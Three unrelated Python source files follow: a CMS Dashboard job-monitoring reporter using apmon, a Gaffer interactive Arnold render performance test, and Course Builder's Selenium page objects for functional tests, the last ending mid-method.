        dashboard_parameters = [("Dashboard_taskid", self._taskid),
                                ("Dashboard_monitorid", dashboard_monitorid),
                                ("Dashboard_syncid", dashboard_syncid),
                                ]
        classads += dashboard_parameters
        # Add dashboard paramenters to the SHELL environment
        envpars = ' '.join("{0}='{1}'".format(ad, value) for ad, value in dashboard_parameters)
        # envpars += ' Dashboard_Id=$(Process)'
        nargs += ['-a', '+environment="{0}"'.format(envpars)]
        self.monitor.environment = envpars
        return sub
class Monitor(object):
    """Reports task and job lifecycle events to the CMS Dashboard via the
    apmon API (``apmonSend``/``apmonFree``).

    Python 2 code. The user's grid identity is read from the active VOMS
    proxy at construction time.
    """
    def __init__(self, taskid):
        self._taskid = taskid
        # Resolve the grid identity from the user's proxy certificate.
        p = subprocess.Popen(["voms-proxy-info", "-identity"],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        id, err = p.communicate()
        id = id.strip()
        # Keep only the common name from the DN (text after the last /CN=).
        self.__fullname = id.rsplit('/CN=', 1)[1]
        self.__username = u'unknown'
        self.__cmssw_version = "unknown"
        # self.__executable = "unknown"
        # Set later via set_executable() once the submit file is parsed.
        self.__executable = "unknown"
    def generate_ids(self, jobid):
        """Return the (monitorid, syncid) pair the Dashboard expects for a
        given job id within this task."""
        monitorid = '{0}_{1}/{0}'.format(jobid,
                    'https://login.uscms.org/{0}'.format(sha1(self._taskid).hexdigest()[-16:]))
        syncid = 'https://login.uscms.org//{0}//12345.{1}'.format(self._taskid, jobid)
        return monitorid, syncid
    def free(self):
        # Flush/release apmon resources after a batch of sends.
        apmonFree()
    def register_run(self):
        """Send the task-level metadata record ('TaskMeta') for this task."""
        apmonSend(self._taskid, 'TaskMeta', {
            'taskId': self._taskid,
            'jobId': 'TaskMeta',
            'tool': 'cmsconnect',
            'tool_ui': os.environ.get('HOSTNAME', ''),
            'SubmissionType': 'direct',
            'JSToolVersion': '3.2.1',
            'scheduler': 'condor',
            'GridName': '/CN=' + self.__fullname,
            'ApplicationVersion': self.__cmssw_version,
            'taskType': 'analysis',
            'vo': 'cms',
            'user': self.__username,
            'CMSUser': self.__username,
            'datasetFull': '',
            'resubmitter': 'user',
            'exe': self.__executable
            })
        self.free()
    def register_job(self, id):
        """Register a single job with the Dashboard; returns the generated
        (monitorid, syncid) pair."""
        monitorid, syncid = self.generate_ids(id)
        apmonSend(self._taskid, monitorid, {
            'taskId': self._taskid,
            'jobId': monitorid,
            'sid': syncid,
            'broker': 'condor',
            'bossId': str(id),
            'SubmissionType': 'Direct',
            'TargetSE': 'cmseos.fnal.gov',
            'localId': '',
            'tool': 'cmsconnect',
            'JSToolVersion': '3.2.1',
            'tool_ui': os.environ.get('HOSTNAME', ''),
            'scheduler': 'condor',
            'GridName': '/CN=' + self.__fullname,
            'ApplicationVersion': self.__cmssw_version,
            'taskType': 'analysis',
            'vo': 'cms',
            'user': self.__username,
            'CMSUser': self.__username,
            # 'datasetFull': self.datasetPath,
            'resubmitter': 'user',
            'exe': self.__executable
            })
        return monitorid, syncid
    def update_job(self, id, status):
        """Send a status-change record (e.g. 'Pending') for one job."""
        monitorid, syncid = self.generate_ids(id)
        apmonSend(self._taskid, monitorid, {
            'taskId': self._taskid,
            'jobId': monitorid,
            'sid': syncid,
            'StatusValueReason': '',
            'StatusValue': status,
            'StatusEnterTime':
            "{0:%F_%T}".format(datetime.datetime.utcnow()),
            'StatusDestination': 'unknown',
            'RBname': 'condor'
            })
        # apmonFree()
    def set_executable(self, executable):
        # Record the executable name included in subsequent reports.
        self.__executable = executable
    @property
    def environment(self):
        # Environment string assembled by CMSReporter.cms_dashboard_report.
        return self._environment
    @environment.setter
    def environment(self, environ):
        self._environment = environ
|
|
##########################################################################
#
# Copyright (c) 2020, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import imath
import math
import os
import unittest
import IECore
import IECoreScene
import Gaffer
import GafferArnold
import GafferImage
import GafferImageUI
import GafferScene
import GafferSceneTest
import GafferTest
import GafferUI
import GafferUITest
import GafferImageTest
from Qt import QtCore
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
class InteractiveArnoldRenderPerformanceTest( GafferUITest.TestCase ) :
    """Measures throughput of an interactive Arnold render, with and without
    a Viewer UI and with and without an image Blur downstream of the Catalogue.
    """

    # Arnold outputs licensing warnings that would cause failures
    failureMessageLevel = IECore.MessageHandler.Level.Error

    def runInteractive( self, useUI, useBlur, resolution ):
        """Build a simple textured-sphere scene, start an interactive render,
        animate the camera for a fixed number of steps, and record iterations
        (tile updates in UI mode, channelData computes otherwise) into the
        enclosing PerformanceScope.

        useUI      : drive a real Viewer via the Qt event loop when True.
        useBlur    : watch a Blur downstream of the Catalogue when True.
        resolution : square render resolution in pixels.
        """
        script = Gaffer.ScriptNode()

        script["Camera"] = GafferScene.Camera()
        script["Camera"]["transform"]["translate"]["z"].setValue( 6 )

        script["Sphere"] = GafferScene.Sphere( "Sphere" )
        script["Sphere"]["radius"].setValue( 10 )

        script["ImageShader"] = GafferArnold.ArnoldShader()
        script["ImageShader"].loadShader( "image" )
        script["ImageShader"]["parameters"]["filename"].setValue( "${GAFFER_ROOT}/python/GafferImageTest/images/GafferChecker.exr" )
        script["ImageShader"]["parameters"]["sscale"].setValue( 16 )
        script["ImageShader"]["parameters"]["tscale"].setValue( 16 )

        script["ShaderAssignment"] = GafferScene.ShaderAssignment()
        script["ShaderAssignment"]["in"].setInput( script["Sphere"]["out"] )
        script["ShaderAssignment"]["shader"].setInput( script["ImageShader"]["out"] )

        script["Group"] = GafferScene.Group()
        script["Group"]["in"][0].setInput( script["Camera"]["out"] )
        script["Group"]["in"][1].setInput( script["ShaderAssignment"]["out"] )

        script["StandardOptions"] = GafferScene.StandardOptions()
        script["StandardOptions"]["in"].setInput( script["Group"]["out"] )
        script["StandardOptions"]["options"]["renderCamera"]["value"].setValue( '/group/camera' )
        script["StandardOptions"]["options"]["renderCamera"]["enabled"].setValue( True )
        script["StandardOptions"]["options"]["renderResolution"]["value"].setValue( imath.V2i( resolution, resolution ) )
        script["StandardOptions"]["options"]["renderResolution"]["enabled"].setValue( True )

        script["ArnoldOptions"] = GafferArnold.ArnoldOptions( "ArnoldOptions" )
        script["ArnoldOptions"]["in"].setInput( script["StandardOptions"]["out"] )
        # Make sure we leave some CPU available for Gaffer
        script["ArnoldOptions"]["options"]["threads"]["value"].setValue( -1 )
        script["ArnoldOptions"]["options"]["threads"]["enabled"].setValue( True )

        # Route the beauty pass back into this process via the display driver
        # server, so the Catalogue receives the live image.
        script["Outputs"] = GafferScene.Outputs()
        script["Outputs"].addOutput(
            "beauty",
            IECoreScene.Output(
                "Interactive/Beauty",
                "ieDisplay",
                "rgba",
                {
                    "quantize" : IECore.IntVectorData( [ 0, 0, 0, 0 ] ),
                    "driverType" : 'ClientDisplayDriver',
                    "displayHost" : 'localhost',
                    "displayPort" : str( GafferImage.Catalogue.displayDriverServer().portNumber() ),
                    "remoteDisplayType" : 'GafferImage::GafferDisplayDriver',
                    "filter" : 'box',
                }
            )
        )
        script["Outputs"]["in"].setInput( script["ArnoldOptions"]["out"] )

        script["InteractiveArnoldRender"] = GafferArnold.InteractiveArnoldRender()
        script["InteractiveArnoldRender"]["in"].setInput( script["Outputs"]["out"] )

        script["Catalogue"] = GafferImage.Catalogue( "Catalogue" )
        script["Catalogue"]["directory"].setValue( self.temporaryDirectory() + "/catalogues/test" )

        script["Blur"] = GafferImage.Blur( "Blur" )
        script["Blur"]["in"].setInput( script["Catalogue"]["out"] )
        script["Blur"]["radius"]["x"].setValue( 1.0 )
        script["Blur"]["radius"]["y"].setValue( 1.0 )

        # The node whose output we observe for the measurement.
        watchNode = script["Blur"] if useBlur else script["Catalogue"]

        if useUI:

            with GafferUI.Window() as window :
                window.setFullScreen( True )
                viewer = GafferUI.Viewer( script )
            window.setVisible( True )
            viewer.setNodeSet( Gaffer.StandardSet( [ watchNode ] ) )

            script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Running )
            self.waitForIdle( 10 )
            viewer.view().viewportGadget().frame( viewer.view().viewportGadget().getPrimaryChild().bound(), imath.V3f( 0, 0, 1 ) )

            # Animate the camera from a Qt timer; the event loop is stopped
            # after 50 frames, bounding the measurement.
            frameCounter = {'i' : 0}
            def testFunc():
                frameCounter['i'] += 1
                script["Camera"]["transform"]["translate"]["x"].setValue( math.sin( frameCounter['i'] * 0.1 ) )
                if frameCounter['i'] >= 50:
                    GafferUI.EventLoop.mainEventLoop().stop()

            timer = QtCore.QTimer()
            timer.setInterval( 20 )
            timer.timeout.connect( testFunc )

            GafferImageUI.ImageGadget.resetTileUpdateCount()
            timer.start()

            with GafferTest.TestRunner.PerformanceScope() as ps:
                GafferUI.EventLoop.mainEventLoop().start()
            # Iterations = number of image tiles redrawn during the run.
            ps.setNumIterations( GafferImageUI.ImageGadget.tileUpdateCount() )

            script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Stopped )

            del window, viewer, timer
            self.waitForIdle( 10 )

        else:

            with GafferTest.ParallelAlgoTest.UIThreadCallHandler() as h :
                # Capture Arnold's startup chatter so it doesn't count as
                # a test failure (see failureMessageLevel above).
                with IECore.CapturingMessageHandler() as mh :
                    script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Running )
                    h.waitFor( 2 )
                arnoldStartupErrors = mh.messages

                tc = Gaffer.ScopedConnection( GafferImageTest.connectProcessTilesToPlugDirtiedSignal( watchNode["out"] ) )

                with GafferTest.TestRunner.PerformanceScope() as ps:
                    with Gaffer.PerformanceMonitor() as m:
                        for i in range( 250 ):
                            script["Camera"]["transform"]["translate"]["x"].setValue( math.sin( ( i + 1 ) * 0.1 ) )
                            h.waitFor( 0.02 )
                    # Iterations = channelData computes on the watched output.
                    ps.setNumIterations( m.plugStatistics( watchNode["out"]["channelData"].source() ).computeCount )

                script['InteractiveArnoldRender']['state'].setValue( GafferScene.InteractiveRender.State.Stopped )

    # NOTE: These tests should be a lot more effective in terms of measuring exact performance
    # if the "repeat" parameter is turned up, but I've currently set it to just 1 because:
    # * I wanted to minimize the time spent on the UI tests
    # * The non-UI tests for a mysterious reason run faster the first time, so adding more repetitions doesn't
    #   affect the minimum result
    @GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
    def testPerf( self ) :
        self.runInteractive( False, False, 2000 )

    @GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
    def testPerfWithBlur( self ) :
        self.runInteractive( False, True, 1000 )

    @GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
    def testUIPerf( self ) :
        self.runInteractive( True, False, 2000 )

    @GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
    def testUIPerfWithBlur( self ) :
        self.runInteractive( True, True, 1000 )
# Script entry point: run the performance tests through the standard
# unittest runner when executed directly.
if __name__ == "__main__":
    unittest.main()
|
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Page objects used in functional tests for Course Builder."""
# Module author attribution, per Course Builder convention.
__author__ = [
    'John Orr (jorr@google.com)'
]
import re
import time
from selenium.common import exceptions
from selenium.webdriver.common import action_chains
from selenium.webdriver.common import by
from selenium.webdriver.common import keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support import select
from selenium.webdriver.support import wait
DEFAULT_TIMEOUT = 15
def get_parent_element(web_element):
    """Return the immediate DOM parent of web_element via an XPath hop."""
    parent = web_element.find_element_by_xpath('..')
    return parent
class PageObject(object):
    """Superclass to hold shared logic used by page objects."""

    def __init__(self, tester):
        # tester is the enclosing TestCase; it owns the WebDriver instance.
        self._tester = tester

    def get(self, url, can_retry=True):
        """Load url, retrying while the dev appserver is still warming up.

        Retries up to 10 times (sleeping 5s between attempts) when the page
        reports the site as down; raises TimeoutException when all attempts
        are exhausted.
        """
        if can_retry:
            tries = 10
        else:
            tries = 1
        while tries > 0:
            tries -= 1
            self._tester.driver.get(url)
            if 'The website may be down' in self._tester.driver.page_source:
                time.sleep(5)
                continue
            return
        # Bug fix: the URL was previously passed as a second positional
        # argument (TimeoutException's 'screen' parameter) instead of being
        # interpolated into the message.
        raise exceptions.TimeoutException(
            'Timeout waiting for %s page to load' % url)

    def wait(self, timeout=None):
        """Return a WebDriverWait using the given (or default) timeout."""
        if timeout is None:
            timeout = DEFAULT_TIMEOUT
        return wait.WebDriverWait(self._tester.driver, timeout)

    def find_element_by_css_selector(self, selector, index=None):
        # index=None expects a unique match; otherwise return the nth match.
        if index is None:
            return self._tester.driver.find_element_by_css_selector(selector)
        else:
            return self._tester.driver.find_elements_by_css_selector(
                selector)[index]

    def find_element_by_id(self, elt_id):
        return self._tester.driver.find_element_by_id(elt_id)

    def find_element_by_link_text(self, text, index=None):
        # index=None expects a unique match; otherwise return the nth match.
        if index is None:
            return self._tester.driver.find_element_by_link_text(text)
        else:
            return self._tester.driver.find_elements_by_link_text(text)[index]

    def find_element_by_name(self, name):
        return self._tester.driver.find_element_by_name(name)

    def expect_status_message_to_be(self, value):
        """Wait until the butterbar shows the given status text."""
        self.wait().until(
            ec.text_to_be_present_in_element(
                (by.By.ID, 'gcb-butterbar-message'), value))

    def wait_until_status_message_hidden(self):
        """Wait for the butterbar to disappear; returns self for chaining."""
        self.wait().until(
            ec.invisibility_of_element_located(
                (by.By.ID, 'gcb-butterbar-message')))
        return self
class EditorPageObject(PageObject):
    """Page object for pages which wait for the editor to finish loading."""

    def __init__(self, tester):
        super(EditorPageObject, self).__init__(tester)

        def editor_ready(unused_driver):
            # Ready once the butterbar reports success or has been hidden.
            bar = self.find_element_by_id('gcb-butterbar-message')
            if 'Success' in bar.text:
                return True
            return not bar.is_displayed()

        self.wait().until(editor_ready)

    def set_status(self, status):
        """Choose a visibility status from the 'is_draft' drop-down."""
        status_select = select.Select(self.find_element_by_name('is_draft'))
        status_select.select_by_visible_text(status)
        return self

    def click_save(self, link_text='Save', status_message='Saved'):
        """Click the save control and wait for its confirmation message."""
        save_link = self.find_element_by_link_text(link_text)
        save_link.click()
        self.expect_status_message_to_be(status_message)
        return self

    def _close_and_return_to(self, continue_page):
        """Close the editor and hand control to the given page object class."""
        close_link = self.find_element_by_link_text('Close')
        close_link.click()
        return continue_page(self._tester)
class DashboardEditor(EditorPageObject):
    """A base class for the editors accessed from the Dashboard."""

    def click_close(self):
        """Dismiss the editor and land back on the Dashboard."""
        destination = DashboardPage
        return self._close_and_return_to(destination)
class RootPage(PageObject):
    """Page object to model the interactions with the root page."""

    def _add_default_course_if_needed(self, base_url):
        """Setup default read-only course if not yet setup."""
        # Check whether the sample course has already been deployed.
        self.get(base_url + '/')
        if 'Power Searching with Google' in self._tester.driver.page_source:
            return
        # Not deployed yet: log in as admin, activate it, then log out.
        LoginPage(self._tester).login('test@example.com', admin=True)
        self.get(base_url + '/admin?action=settings')
        override_page = AdminSettingsPage(self._tester).click_override(
            'gcb_courses_config')
        override_page.set_status('Active').click_save()
        self.get(base_url + '/admin?action=courses')
        self.find_element_by_link_text('Logout').click()

    def load(self, base_url):
        """Load the course root, deploying the default course first if needed."""
        self._add_default_course_if_needed(base_url)
        self.get(base_url + '/')
        return self

    def load_welcome_page(self, base_url):
        """Log in as admin and open the post-install welcome page."""
        self.click_login().login('test@example.com', admin=True)
        self.get(base_url + '/admin?action=welcome')
        return WelcomePage(self._tester)

    def click_login(self):
        self.find_element_by_link_text('Login').click()
        return LoginPage(self._tester)

    def click_dashboard(self):
        self.find_element_by_link_text('Dashboard').click()
        return DashboardPage(self._tester)

    def click_admin(self):
        self.find_element_by_link_text('Admin').click()
        return AdminPage(self._tester)

    def click_announcements(self):
        self.find_element_by_link_text('Announcements').click()
        return AnnouncementsPage(self._tester)

    def click_register(self):
        self.find_element_by_link_text('Register').click()
        return RegisterPage(self._tester)
class WelcomePage(PageObject):
    """Page object for the post-install welcome page."""

    def click_explore_sample_course(self):
        """Follow the 'Explore' button to the sample course dashboard."""
        explore_button = self.find_element_by_id('explore')
        explore_button.click()
        return DashboardPage(self._tester)
class RegisterPage(PageObject):
    """Page object to model the registration page."""

    def enroll(self, name):
        """Type the student name into the enrollment form and submit it."""
        name_field = self.find_element_by_name('form01')
        name_field.send_keys(name)
        name_field.submit()
        return self

    def verify_enrollment(self):
        """Assert that the post-registration confirmation text is shown."""
        content = self.find_element_by_css_selector('.gcb-top-content')
        self._tester.assertTrue('Thank you for registering' in content.text)
        return self

    def click_course(self):
        """Follow the 'Course' link back to the course root page."""
        course_link = self.find_element_by_link_text('Course')
        course_link.click()
        return RootPage(self._tester)
class AnnouncementsPage(PageObject):
    """Page object to model the announcements page."""

    def click_add_new(self):
        """Open the editor for a brand-new announcement."""
        add_button = self.find_element_by_css_selector(
            '#gcb-add-announcement > button')
        add_button.click()
        return AnnouncementsEditorPage(self._tester)

    def verify_announcement(self, title=None, date=None, body=None):
        """Verify that the announcement has the given fields."""
        find_all = self._tester.driver.find_elements_by_css_selector
        if title:
            # Title renders as the first aside heading.
            self._tester.assertEquals(
                title, find_all('div.gcb-aside h2')[0].text)
        if date:
            # Date is the first paragraph, body the second.
            self._tester.assertEquals(
                date, find_all('div.gcb-aside p')[0].text)
        if body:
            self._tester.assertEquals(
                body, find_all('div.gcb-aside p')[1].text)
        return self
class AnnouncementsEditorPage(EditorPageObject):
    """Page to model the announcements editor."""

    def _fill_field(self, name, value):
        # Clear any pre-existing text before typing the replacement.
        field = self.find_element_by_name(name)
        field.clear()
        field.send_keys(value)

    def enter_fields(self, title=None, date=None, body=None):
        """Enter title, date, and body into the announcement form."""
        if title:
            self._fill_field('title', title)
        if date:
            self._fill_field('date', date)
        if body:
            self._fill_field('html', body)
        return self

    def click_close(self):
        """Close the editor and return to the announcements list."""
        return self._close_and_return_to(AnnouncementsPage)
class LoginPage(PageObject):
    """Page object to model the interactions with the login page."""

    def login(self, login, admin=False):
        """Fill in the email, optionally tick 'admin', and submit the form."""
        email_field = self.find_element_by_id('email')
        email_field.clear()
        email_field.send_keys(login)
        if admin:
            admin_checkbox = self.find_element_by_id('admin')
            admin_checkbox.click()
        submit_button = self.find_element_by_id('submit-login')
        submit_button.click()
        return RootPage(self._tester)
class DashboardPage(PageObject):
    """Page object to model the interactions with the dashboard landing page."""

    def _click_link(self, text):
        # Shared helper: follow a link identified by its anchor text.
        self.find_element_by_link_text(text).click()

    def _click_css(self, selector):
        # Shared helper: click the element matching a CSS selector.
        self.find_element_by_css_selector(selector).click()

    def load(self, base_url, name):
        """Navigate straight to the named course's dashboard."""
        self.get('/'.join([base_url, name, 'dashboard']))
        return self

    def verify_read_only_course(self):
        butterbar_text = self.find_element_by_id('gcb-butterbar-message').text
        self._tester.assertEquals('Read-only course.', butterbar_text)
        return self

    def verify_selected_tab(self, tab_text):
        tab = self.find_element_by_link_text(tab_text)
        self._tester.assertEquals('selected', tab.get_attribute('class'))

    def verify_not_publicly_available(self):
        butterbar_text = self.find_element_by_id('gcb-butterbar-message').text
        self._tester.assertEquals(
            'The course is not publicly available.', butterbar_text)
        return self

    def click_import(self):
        self._click_css('#import_course')
        return Import(self._tester)

    def click_add_unit(self):
        self._click_css('#add_unit > button')
        return AddUnit(self._tester, AddUnit.CREATION_MESSAGE)

    def click_edit_unit(self, unit_title):
        self._click_link(unit_title)
        self._click_link('Edit Unit')
        return AddUnit(self._tester, AddUnit.LOADED_MESSAGE)

    def click_add_assessment(self):
        self._click_css('#add_assessment > button')
        return AddAssessment(self._tester)

    def click_add_link(self):
        self._click_css('#add_link > button')
        return AddLink(self._tester)

    def click_add_lesson(self):
        self._click_css('#add_lesson > button')
        return AddLesson(self._tester)

    def click_organize(self):
        self._click_css('#edit_unit_lesson')
        return Organize(self._tester)

    def click_assets(self):
        self._click_link('Assets')
        return AssetsPage(self._tester)

    def click_settings(self):
        # Settings lands on the Homepage sub-tab by default in these tests.
        self._click_link('Settings')
        self._click_link('Homepage')
        return SettingsPage(self._tester)

    def verify_course_outline_contains_unit(self, unit_title):
        # Raises NoSuchElementException if the unit is absent.
        self.find_element_by_link_text(unit_title)
        return self

    def click_on_course_outline_components(self, title):
        self._click_link(title)
        return LessonPage(self._tester)

    def click_analytics(self, name):
        self._click_link('Analytics')
        self._click_link(name)
        return AnalyticsPage(self._tester)

    def click_course(self):
        self._click_link('Course')
        return RootPage(self._tester)

    def click_i18n(self):
        self._click_link('I18N')
        return self
class CourseContentPage(RootPage):
    """Page object for viewing course content."""

    def _find_question(self, question_batch_id, question_text):
        """Return the standalone MC question whose text matches exactly.

        Raises AssertionError when the batch has no questions or none match.
        """
        questions = self._tester.driver.find_elements_by_css_selector(
            '[data-question-batch-id="%s"] .qt-mc-question.qt-standalone' %
            question_batch_id)
        if not questions:
            raise AssertionError('No questions in batch "%s" found' %
                                 question_batch_id)
        for question in questions:
            if (question.find_element_by_css_selector('.qt-question').text ==
                question_text):
                return question
        raise AssertionError('No questions in batch "%s" ' % question_batch_id +
                             'matched "%s"' % question_text)

    def set_answer_for_mc_question(self, question_batch_id,
                                   question_text, answer):
        """Tick the radio button for the choice whose text equals answer."""
        question = self._find_question(question_batch_id, question_text)
        choices = question.find_elements_by_css_selector(
            '.qt-choices > *')
        for choice in choices:
            if choice.text == answer:
                choice.find_element_by_css_selector(
                    'input[type="radio"]').click()
                return self
        # Bug fix: the batch id used to be appended with '+' instead of
        # being interpolated with '%', leaving a literal '%s' in the message.
        raise AssertionError(
            'No answer to question "%s" ' % question_text +
            'in batch "%s" ' % question_batch_id +
            'had an answer matching "%s"' % answer)

    def submit_question_batch(self, question_batch_id, button_text):
        """Press the named check/submit button inside a question batch.

        Lesson batches (ids starting with 'L') stay on the current page;
        assessment submissions navigate to a confirmation page.
        """
        buttons = self._tester.driver.find_elements_by_css_selector(
            'div[data-question-batch-id="%s"] .qt-check-answer-button' %
            question_batch_id)
        for button in buttons:
            if button_text in button.text:
                button.click()
                if question_batch_id.startswith('L'):
                    return self
                else:
                    return AssessmentConfirmationPage(self._tester)
        raise AssertionError('No button found matching "%s"' % button_text)
class LessonPage(CourseContentPage):
    """Object specific to Lesson behavior."""

    def _feedback_text(self, question_batch_id, question_text):
        # Inline feedback shown next to a question after it is checked.
        question = self._find_question(question_batch_id, question_text)
        return question.find_element_by_css_selector('.qt-feedback').text

    def _grade_report_text(self, question_batch_id):
        # Per-batch score summary shown after grading.
        report = self.find_element_by_css_selector(
            '.qt-grade-report[data-question-batch-id="%s"]' % question_batch_id)
        return report.text

    def verify_correct_submission(self, question_batch_id, question_text):
        feedback = self._feedback_text(question_batch_id, question_text)
        if feedback == 'Yes, the answer is correct.':
            return self
        raise Exception('Incorrect answer submitted')

    def verify_incorrect_submission(self, question_batch_id, question_text):
        feedback = self._feedback_text(question_batch_id, question_text)
        if feedback == 'No, the answer is incorrect.':
            return self
        raise Exception('Correct answer submitted')

    def verify_correct_grading(self, question_batch_id):
        if self._grade_report_text(question_batch_id) == 'Your score is: 1/1':
            return self
        raise Exception('Incorrect answer submitted')

    def verify_incorrect_grading(self, question_batch_id):
        if self._grade_report_text(question_batch_id) == 'Your score is: 0/1':
            return self
        raise Exception('Correct answer submitted')

    def play_video(self, instanceid):
        """Start playback of the video element with the given instance id."""
        self._tester.driver.execute_script(
            'document.getElementById("%s").play();' % instanceid)
        time.sleep(1)  # Let the video get started before we do anything else.
        return self

    def pause_video(self, instanceid):
        """Pause the video element with the given instance id."""
        self._tester.driver.execute_script(
            'document.getElementById("%s").pause();' % instanceid)
        return self

    def wait_for_video_state(self, instanceid, attribute, desired_state,
                             max_patience):
        """Poll a JS attribute of the video element until it matches."""
        def in_desired_state(driver):
            state = driver.execute_script(
                'return document.getElementById("%s").%s' % (
                    instanceid, attribute))
            return state == desired_state
        self.wait(timeout=max_patience).until(in_desired_state)
        return self
class AssessmentConfirmationPage(RootPage):
    """Confirmation page shown after a graded assessment is submitted."""

    def _completion_heading(self):
        # The score summary lives in the page's top heading block.
        return self.find_element_by_css_selector(
            '.gcb-top-content[role="heading"]')

    def verify_correct_submission(self):
        heading = self._completion_heading()
        if 'Your score for this assessment is 100%' not in heading.text:
            raise AssertionError('Success indication not found in "%s"' %
                                 heading.text)
        return self

    def verify_incorrect_submission(self):
        heading = self._completion_heading()
        if 'Your score for this assessment is 0%' not in heading.text:
            raise AssertionError('Failure indication not found in "%s"' %
                                 heading.text)
        return self

    def return_to_unit(self):
        """Follow the 'Return to Unit' link back to the lesson."""
        back_link = self.find_element_by_link_text('Return to Unit')
        back_link.click()
        return LessonPage(self._tester)
class SettingsPage(PageObject):
    """Page object for the dashboard's course settings tab."""

    def __init__(self, tester):
        super(SettingsPage, self).__init__(tester)

        def successful_load(unused_driver):
            # Loaded once the 'Homepage' sub-tab is marked as selected.
            tab = self.find_element_by_link_text('Homepage')
            return 'selected' == tab.get_attribute('class')

        # Bug fix: removed a leftover debug print statement that dumped the
        # tab's class and href to stdout on every poll of this wait loop.
        self.wait().until(successful_load)

    def click_course_options(self):
        """Open the course options editor."""
        self.find_element_by_css_selector(
            '#edit_course_settings > button').click()
        return CourseOptionsEditorPage(self._tester)
class CourseOptionsEditorPage(EditorPageObject):
    """Page object for the dashboard's course options sub-tab."""

    def click_close(self):
        return self._close_and_return_to(SettingsPage)

    def click_close_and_confirm(self):
        """Close the editor, accepting the 'unsaved changes' browser alert."""
        close_link = self.find_element_by_link_text('Close')
        close_link.click()
        self._tester.driver.switch_to_alert().accept()
        time.sleep(0.2)  # Give the page a moment to settle after the alert.
        return SettingsPage(self._tester)

    def set_course_name(self, name):
        """Replace the course title field's contents with name."""
        title_field = self.find_element_by_name('course:title')
        title_field.clear()
        title_field.send_keys(name)
        return self
class AssetsPage(PageObject):
    """Page object for the dashboard's assets tab."""

    def click_sub_tab(self, text):
        # Sub-tabs (Images, Questions, Labels, ...) render as plain links.
        self.find_element_by_link_text(text).click()
        return self

    def click_upload(self):
        self.find_element_by_link_text('Upload to assets/img').click()
        return AssetsEditorPage(self._tester)

    def verify_image_file_by_name(self, name):
        self.find_element_by_link_text(name)  # throw exception if not found
        return self

    def verify_no_image_file_by_name(self, name):
        # Wait for the section header so the list is known to have rendered
        # before asserting the file's absence.
        self.wait().until(ec.visibility_of_element_located((
            by.By.XPATH, '//h3[starts-with(.,\'Images & Documents\')]')))
        try:
            self.find_element_by_link_text(name)  # throw exception if not found
            raise AssertionError('Found file %s which should be absent' % name)
        except exceptions.NoSuchElementException:
            pass
        return self

    def click_edit_image(self, name):
        # The edit icon lives in the same row (parent element) as the link.
        get_parent_element(
            self.find_element_by_link_text(name)
        ).find_element_by_css_selector('a.icon-edit').click()
        return ImageEditorPage(self._tester)

    def click_add_short_answer(self):
        self.find_element_by_link_text('Add Short Answer').click()
        return ShortAnswerEditorPage(self._tester)

    def click_add_multiple_choice(self):
        self.find_element_by_link_text('Add Multiple Choice').click()
        return MultipleChoiceEditorPage(self._tester)

    def click_add_question_group(self):
        self.find_element_by_link_text('Add Question Group').click()
        return QuestionEditorPage(self._tester)

    def click_edit_short_answer(self, name):
        raise NotImplementedError

    def click_edit_mc_question(self):
        raise NotImplementedError

    def verify_question_exists(self, description):
        """Verifies question description exists on list of question banks."""
        tds = self._tester.driver.find_elements_by_css_selector(
            '#gcb-main-content tbody td')
        for td in tds:
            try:
                self._tester.assertEquals(description, td.text)
                return self
            except AssertionError:
                # Not this table cell; keep scanning.
                continue
        raise AssertionError(description + ' not found')

    def click_question_preview(self):
        self.find_element_by_css_selector(
            '#gcb-main-content tbody td .icon-preview').click()
        return self

    def verify_question_preview(self, question_text):
        """Verifies contents of question preview."""
        def load_modal_iframe(driver):
            # The preview renders in a modal iframe; keep polling until the
            # frame exists and the driver has switched into it.
            try:
                driver.switch_to_frame(
                    driver.find_element_by_css_selector('#modal-window iframe'))
            except exceptions.NoSuchFrameException:
                return False
            else:
                return True
        self.wait().until(load_modal_iframe)
